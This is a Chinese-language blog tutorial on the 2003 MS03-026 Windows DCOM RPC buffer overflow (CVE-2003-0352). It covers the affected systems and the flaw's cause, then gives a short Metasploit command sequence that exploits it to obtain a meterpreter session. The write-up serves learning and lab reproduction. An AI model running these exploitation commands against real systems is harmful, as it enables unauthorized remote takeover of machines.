漏洞描述

此漏洞由lds-pl.net漏洞研究组在2003年7月16日发现,漏洞及exp在网上公开后,网上出现了大量的×××实例,利用此漏洞的蠕虫也大量出现。

漏洞编号

CVE-2003-0352

影响系统

    Microsoft Windows XP Professional SP1
    Microsoft Windows XP Professional
    Microsoft Windows XP Home SP1
    Microsoft Windows XP Home
    Microsoft Windows XP
    Microsoft Windows NT 4.0SP6a
    Microsoft Windows NT 4.0SP6
    Microsoft Windows NT 4.0SP5
    Microsoft Windows NT 4.0SP4
    Microsoft Windows NT 4.0SP3
    Microsoft Windows NT 4.0SP2
    Microsoft Windows NT 4.0SP1
    Microsoft Windows NT 4.0
    Microsoft Windows 2003
    Microsoft Windows 2000SP3
    Microsoft Windows 2000SP2
    Microsoft Windows 2000SP1
    Microsoft Windows 2000

×××目标

使用DCOM接口的Windows RPC 服务器

漏洞原理

微软修改dcerpc框架后形成自己的RPC框架来处理进程间的通信。微软的RPC框架在处理TCP/IP信息交换过程中存在的畸形消息时,未正确处理,导致缓冲区溢出漏洞;此漏洞影响使用RPC框架的DCOM接口,DCOM接口用来处理客户端机器发送给服务器的DCOM对象激活请求,如UNC路径。

metasploit exp目标机器

Windows NT SP3-6a
Windows 2000
Windows XP
Windows 2003 Universal

metasploit利用ms03-026

use exploit/windows/dcerpc/ms03_026_dcom
set rhost 
run -j # 后台运行×××
# 如果×××成功,将会直接返回meterpreter会话,否则,×××失败。

×××成功:
ms03-026漏洞原理与复现_第1张图片
×××失败:
ms03-026漏洞原理与复现_第2张图片

概念概述

UNC路径:Universal Naming Convention,通用命名规则;UNC路径为目录的网络路径,如:\\10.129.10.1\c$\

参考文章

tomqq_cu 博客